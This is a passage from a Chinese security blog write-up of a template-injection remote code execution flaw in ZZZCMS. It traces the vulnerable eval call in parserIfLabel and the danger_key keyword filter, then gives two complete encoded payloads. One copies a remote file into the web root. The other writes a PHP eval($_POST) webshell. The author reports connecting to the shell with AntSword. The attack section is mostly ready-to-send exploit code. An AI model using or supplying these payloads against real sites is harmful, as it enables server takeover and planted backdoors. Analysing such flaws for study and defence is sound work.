$data&#x3D;get_cookie( $name,$data ) ;</span><br><span class="line">            &#125;</span><br><span class="line">                  break;</span><br><span class="line">            case &#39;both&#39;:</span><br><span class="line">                  $data &#x3D; _POST( $name ) ? : _GET( $name );</span><br><span class="line">                  break;</span><br><span class="line">      &#125;</span><br><span class="line">    if($name&#x3D;&#x3D;&#39;act&#39;)&#123;</span><br><span class="line">        if(_REQUEST(&#39;act&#39;)!&#x3D;&#39;&#39;)&#123;</span><br><span class="line">            $referer&#x3D;_SERVER(&#39;HTTP_REFERER&#39;);</span><br><span class="line">            if(!defined(&#39;WAPPATH&#39;)) &#123;         </span><br><span class="line">                if ( strpos( $referer, conf(&#39;wappath&#39; )) !&#x3D;&#x3D; FALSE ) &#123;  </span><br><span class="line">                    define( &#39;WAPPATH&#39;, conf(&#39;wappath&#39; ));        </span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">      if ( !is_null( $type ) ) &#123;</span><br><span class="line">        if(ifch($default))&#123;</span><br><span class="line">            $err &#x3D; checkstr( $data, $type, $default );</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            $err &#x3D; checkstr( $data, $type, $name );</span><br><span class="line">        &#125;</span><br><span class="line">            if ( $err[ &#39;code&#39; ] &#x3D;&#x3D; 0 )&#123;</span><br><span class="line">                  if ( $default &#x3D;&#x3D; &#39;layer&#39; ) &#123;</span><br><span class="line">                        layererr( $err[ &#39;err&#39; ] );</span><br><span class="line">                  &#125;else if( $default &#x3D;&#x3D; &#39;json&#39; )&#123;</span><br><span class="line">                        returnmsg(&#39;json&#39;,0,$err[ &#39;err&#39; ]);</span><br><span class="line">                  &#125;else&#123;</span><br><span class="line">                        back($err[ &#39;err&#39; ]);</span><br><span class="line">                  &#125;</span><br><span class="line">        &#125;  </span><br><span class="line">      &#125;</span><br><span class="line">      if ( !is_null( $default ) &amp;&amp; !ifch( $default) ) &#123;</span><br><span class="line">            $data &#x3D; empty( $data ) ? $default : $data;</span><br><span class="line">      &#125;</span><br><span class="line">      return txt_html( $data );</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>6.然后继续回到第三点中的parserCommom方法，在调用parserlocation后会调用parserIfLabel方法，跟进parserIfLabel方法，$zcontent是parserlocation的返回值。danger_key()方法用于过滤危险字符，返回过滤后的值并赋值给$ifstr，接着将$ifstr传递给eval函数，执行完成后返回过滤后的$zcontent，最后渲染$zcontent的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">public</span><br><span class="line">function parserIfLabel( $zcontent ) &#123;&#x2F;&#x2F;漏洞</span><br><span class="line">      $pattern &#x3D; &#39;&#x2F;\&#123;if:([\s\S]+?)&#125;([\s\S]*?)&#123;end\s+if&#125;&#x2F;&#39;;&#x2F;&#x2F;可控导致漏洞</span><br><span class="line">      if ( preg_match_all( $pattern, $zcontent, $matches ) ) &#123;</span><br><span class="line">            $count &#x3D; count( $matches[ 0 ] );</span><br><span class="line">            for ( $i &#x3D; 0; $i &lt; $count; $i++ ) &#123;</span><br><span class="line">                  $flag &#x3D; &#39;&#39;;</span><br><span class="line">                  $out_html &#x3D; &#39;&#39;;</span><br><span class="line">                  $ifstr &#x3D; $matches[ 1 ][ $i ];</span><br><span class="line">                  $ifstr&#x3D;danger_key($ifstr,1);&#x2F;&#x2F;检测恶意字符</span><br><span class="line">               if(strpos($ifstr,&#39;&#x3D;&#39;) !&#x3D;&#x3D; false)&#123;</span><br><span class="line">                  $arr&#x3D; splits($ifstr,&#39;&#x3D;&#39;);</span><br><span class="line">                   if($arr[0]&#x3D;&#x3D;&#39;&#39; || $arr[1]&#x3D;&#x3D;&#39;&#39;)&#123;</span><br><span class="line">                        error(&#39;很抱歉，模板中有错误的判断,请修正【&#39;.$ifstr.&#39;】&#39;);</span><br><span class="line">                   &#125;</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;&#x3D;&#39;, &#39;&#x3D;&#x3D;&#39;, $ifstr );     </span><br><span class="line">               &#125;</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;&lt;&gt;&#39;, &#39;!&#x3D;&#39;, $ifstr );</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;or&#39;, &#39;||&#39;, $ifstr );</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;and&#39;, &#39;&amp;&amp;&#39;, $ifstr );</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;mod&#39;, &#39;%&#39;, $ifstr );</span><br><span class="line">                  $ifstr &#x3D; str_replace( &#39;not&#39;, &#39;!&#39;, $ifstr );</span><br><span class="line">               if ( preg_match( &#39;&#x2F;\&#123;|&#125;&#x2F;&#39;, $ifstr)) &#123;    </span><br><span class="line">                 error(&#39;很抱歉，模板中有错误的判断,请修正&#39;.$ifstr);</span><br><span class="line">               &#125;else&#123;</span><br><span class="line">                 @eval( &#39;if(&#39; . $ifstr . &#39;)&#123;$flag&#x3D;&quot;if&quot;;&#125;else&#123;$flag&#x3D;&quot;else&quot;;&#125;&#39;  );&#x2F;&#x2F;漏洞点</span><br><span class="line">               &#125;      </span><br><span class="line">          ……        </span><br><span class="line"></span><br><span class="line">      &#125;</span><br><span class="line">      return $zcontent;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>7.整个调用过程如下图所示：</p>
<p><img src="/2020/02/13/zzzcms/Users\eva\AppData\Roaming\Typora\typora-user-images\image-20201019101039399.png" alt="image-20201019101039399"></p>
<h2 id="过滤函数分析"><a href="#过滤函数分析" class="headerlink" title="过滤函数分析"></a>过滤函数分析</h2><p>danger_key会过滤很多常用函数，有关命令执行以及写文件的函数都已被过滤，部分编码函数decode，chr等也不能利用，但是类似array_map，array_filter，uasort等回调函数并没有进行过滤。</p>
<p>同时会过滤常见的字符，比如这里会将单引号、双引号等特殊字符html编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">function danger_key($s,$type&#x3D;&#39;&#39;) &#123;</span><br><span class="line">    $s&#x3D;empty($type) ? htmlspecialchars($s) : $s;</span><br><span class="line">    $key&#x3D;array(&#39;php&#39;,&#39;preg&#39;,&#39;decode&#39;,&#39;post&#39;,&#39;get&#39;,&#39;cookie&#39;,&#39;session&#39;,&#39;$&#39;,&#39;exec&#39;,&#39;ascii&#39;,&#39;ord&#39;,&#39;eval&#39;,&#39;replace&#39;);</span><br><span class="line">    $s &#x3D; str_ireplace($key,&quot;*&quot;,$s); </span><br><span class="line">    $danger&#x3D;array(&#39;php&#39;,&#39;preg&#39;,&#39;server&#39;,&#39;chr&#39;,&#39;decode&#39;,&#39;html&#39;,&#39;md5&#39;,&#39;post&#39;,&#39;get&#39;,&#39;request&#39;,&#39;file&#39;,&#39;cookie&#39;,&#39;session&#39;,&#39;sql&#39;,&#39;mkdir&#39;,&#39;copy&#39;,&#39;fwrite&#39;,&#39;del&#39;,&#39;encrypt&#39;,&#39;$&#39;,&#39;system&#39;,&#39;exec&#39;,&#39;shell&#39;,&#39;open&#39;,&#39;ini_&#39;,&#39;chroot&#39;,&#39;eval&#39;,&#39;passthru&#39;,&#39;include&#39;,&#39;require&#39;,&#39;assert&#39;,&#39;union&#39;,&#39;create&#39;,&#39;func&#39;,&#39;symlink&#39;,&#39;sleep&#39;,&#39;ord&#39;,&#39;print&#39;,&#39;echo&#39;);</span><br><span class="line">   foreach ($danger as $val)&#123;</span><br><span class="line">       if(strpos($s,$val) !&#x3D;&#x3D;false)&#123;</span><br><span class="line">        error(&#39;很抱歉，执行出错，发现危险字符【&#39;.$val.&#39;】&#39;);</span><br><span class="line">      &#125;</span><br><span class="line">   &#125;</span><br><span class="line">    return $s;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="构造payload"><a href="#构造payload" class="headerlink" title="构造payload"></a>构造payload</h2><h3 id="array-map"><a href="#array-map" class="headerlink" title="array_map"></a>array_map</h3><p>array_map主要作用是为数组的每个元素应用回调函数。</p>
<blockquote>
<p>用法：array_map ( callable $callback , array $array1 [, array $… ] ) : array</p>
</blockquote>
<p>array_map()：返回数组，是为 array1 每个元素应用 callback函数之后的数组。 array_map() 返回一个 array，数组内容为 array1 的元素按索引顺序为参数调用 callback 后的结果（有更多数组时，还会传入 … 的元素）。 callback 函数形参的数量必须匹配 array_map() 实参中数组的数量。</p>
<h3 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array_map(copy,array(&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;1&#39;),array(&#39;.&#x2F;1.php&#39;));</span><br></pre></td></tr></table></figure>
<p>copy作为回调函数作用是拷贝文件，将第一个参数（源文件路径）拷贝到第二个参数（目标路径），通过array_map函数对其传参。这样我们便可拷贝远程服务器的文件到目标路径实现文件上传。</p>
<p>由于上述过滤规则会导致/‘等字符无法使用，故此处考虑使用base_convert函数</p>
<blockquote>
<p>base_convert ( string $number , int $frombase , int $tobase ) : string</p>
</blockquote>
<p>为了能表示上述payload 的英文字符，这里需要考虑使用36进制，特殊符号可以通过异或的方式得到,具体实现如下：</p>
<table>
<thead>
<tr>
<th>符号</th>
<th>表达式</th>
</tr>
</thead>
<tbody><tr>
<td>[</td>
<td>base_convert(1, 10, 36) ^ base_convert(13, 16, 36)</td>
</tr>
<tr>
<td>]</td>
<td>base_convert(1, 10, 36) ^ base_convert(15, 16, 36)</td>
</tr>
<tr>
<td>\</td>
<td>base_convert(1, 10, 36) ^ base_convert(16, 16, 36)</td>
</tr>
<tr>
<td>^</td>
<td>base_convert(1, 10, 36) ^ base_convert(18, 16, 36)</td>
</tr>
<tr>
<td>_</td>
<td>base_convert(1, 10, 36) ^ base_convert(17, 16, 36)</td>
</tr>
<tr>
<td>`</td>
<td>base_convert(16, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(6, 10, 36)</td>
</tr>
<tr>
<td>+</td>
<td>base_convert(12, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(34, 10, 36)</td>
</tr>
<tr>
<td>(</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(12, 10, 36)</td>
</tr>
<tr>
<td>)</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(11, 10, 36)</td>
</tr>
<tr>
<td>/</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(13, 10, 36)</td>
</tr>
<tr>
<td>.</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(14, 10, 36)</td>
</tr>
<tr>
<td>&lt;</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(32, 10, 36)</td>
</tr>
<tr>
<td>&gt;</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(30, 10, 36)</td>
</tr>
<tr>
<td>=</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(31, 10, 36)</td>
</tr>
<tr>
<td>?</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(29, 10, 36)</td>
</tr>
<tr>
<td>:</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(26, 10, 36)</td>
</tr>
<tr>
<td>;</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(25, 10, 36)</td>
</tr>
<tr>
<td>$</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(24, 10, 36)</td>
</tr>
<tr>
<td>%</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(23, 10, 36)</td>
</tr>
<tr>
<td>&amp;</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(22, 10, 36)</td>
</tr>
<tr>
<td>‘</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(21, 10, 36)</td>
</tr>
<tr>
<td></td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(20, 10, 36)</td>
</tr>
<tr>
<td>!</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(19, 10, 36)</td>
</tr>
<tr>
<td>“</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(18, 10, 36)</td>
</tr>
<tr>
<td>#</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(17, 10, 36)</td>
</tr>
<tr>
<td>,</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(16, 10, 36)</td>
</tr>
<tr>
<td>*</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(10, 10, 36)</td>
</tr>
<tr>
<td>|</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(7, 10, 36)</td>
</tr>
<tr>
<td>{</td>
<td>base_convert(2, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(33, 10, 36)</td>
</tr>
<tr>
<td>}</td>
<td>base_convert(14, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(35, 10, 36)</td>
</tr>
<tr>
<td>~</td>
<td>base_convert(35, 10, 36) ^ base_convert(1, 10, 36) ^ base_convert(5, 10, 36)</td>
</tr>
<tr>
<td>@</td>
<td>base_convert(1, 10, 36) ^ base_convert(26, 10, 36)</td>
</tr>
</tbody></table>
<p>完整的payload如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;if:array_map(base_convert(591910,10,36), array(base_convert(831805,10,36). (base_convert(14,10,36)^base_convert(1,10,36)^base_convert(23,10,36)). (base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)). (base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(127). (base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(0). (base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(0). (base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)).(1). (base_convert(25,10,36)^base_convert(1,10,36)^base_convert(23,10,36)). (base_convert(1,10,36))),array((base_convert(1,10,36)). (base_convert(26,10,36)^base_convert(1,10,36)^base_convert(23,10,36)). (base_convert(33037,10,36))))&#125;&#123;end if&#125;</span><br></pre></td></tr></table></figure>
<p>发送上述payload会在search目录下生成1.php文件。</p>
<p><img src="/2020/02/13/zzzcms/Users\eva\AppData\Roaming\Typora\typora-user-images\image-20201019102614797.png![image-20201019104046447](C:\Users\eva\AppData\Roaming\Typora\typora-user-images\image-20201019104046447.png"></p>
<p>访问/zzzcms/search/1.php，蚁剑连接getshell。</p>
<p><img src="/2020/02/13/zzzcms/Users\eva\AppData\Roaming\Typora\typora-user-images\image-20201019105200703.png" alt="image-20201019105200703"></p>
<h3 id="payload2"><a href="#payload2" class="headerlink" title="payload2"></a>payload2</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array_map(file_put_contents,array(&#39;.&#x2F;1.php&#39;),array(&#39;&lt;?PHP eval($_POST[1]);&#39;));</span><br></pre></td></tr></table></figure>
<p>需要利用四个函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hexdec — 十六进制转换为十进制</span><br><span class="line">dechex — 十进制转换为十六进制</span><br><span class="line">hex2bin — 转换十六进制字符串为二进制字符串</span><br><span class="line">bin2hex — 函数把包含数据的二进制字符串转换为十六进制值</span><br></pre></td></tr></table></figure>
<p>通过base_convert异或构造特殊字符过于繁琐，这里还可以利用hex2bin()和dechex()函数。<br>首先将字符串通过bin2hex()函数编码成十六进制，由于payload中不能存在引号，编码后的结果需要再一次通过hexdec()函数转码成十进制，最后利用hex2bin(dechex(需要解码的字符)还原字符串。构造出payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;if:array_map((hex2bin(dechex(6711660)).hex2bin(dechex(6643568)).hex2bin(dechex(1970560867)).hex2bin(dechex(1869509733)).hex2bin(dechex(7238771)))  ,array(hex2bin(dechex(774844718)).hex2bin(dechex(7366768))),array(hex2bin(dechex(1010770032)).hex2bin(dechex(1752178789)).hex2bin(dechex(1986096168)).hex2bin(dechex(610226255)).hex2bin(dechex(1398037297)).hex2bin(dechex(6105403))))&#125;&#123;end if&#125;</span><br></pre></td></tr></table></figure>
<p>之所以这么拼接是因为本地测试的时候编码解码会出现截断的情况每次好像只能允许是四个字符，但是后来又看了一下hex2bin这个函数，官网说如果输入的十六进制字符串是奇数长数或者无效的十六进制字符串将会抛出 E_WARNING 级别的错误。理论上只要是控制偶数长度就能正常解码，也是后来才知道的也就懒得去看了反正这个payload也还能用哈哈哈。</p>

            </div>
        
        <footer class="article-footer">
        </footer>
    </div>
</article>


    
<nav id="article-nav">
    
        <a href="/2020/02/16/cc1%E9%93%BE/" id="article-nav-newer" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Newer</strong>
            <div class="article-nav-title">
                
                    cc1链
                
            </div>
        </a>
    
    
</nav>





    
    




<!-- baidu url auto push script -->
<script type="text/javascript">
    !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=window.location.href,o=document.referrer;if(!e.test(r)){var n="//api.share.baidu.com/s.gif";o?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var t=new Image;t.src=n}}(window);
</script>     
</section>
        </div>
        <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            G7shot &copy; 2022 
            <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-nd/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/80x15.png" /></a>
            <br> Powered by g7shot.com</a>
            
                <br>
                <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span></span>
                &nbsp;|&nbsp;
                <span id="busuanzi_container_site_pv"><i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span></span>
            
        </div>
    </div>
</footer>

        

    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    
        <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true,
            TeX: {
                equationNumbers: {
                  autoNumber: 'AMS'
                }
            }
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


    </div>
</body>
</html>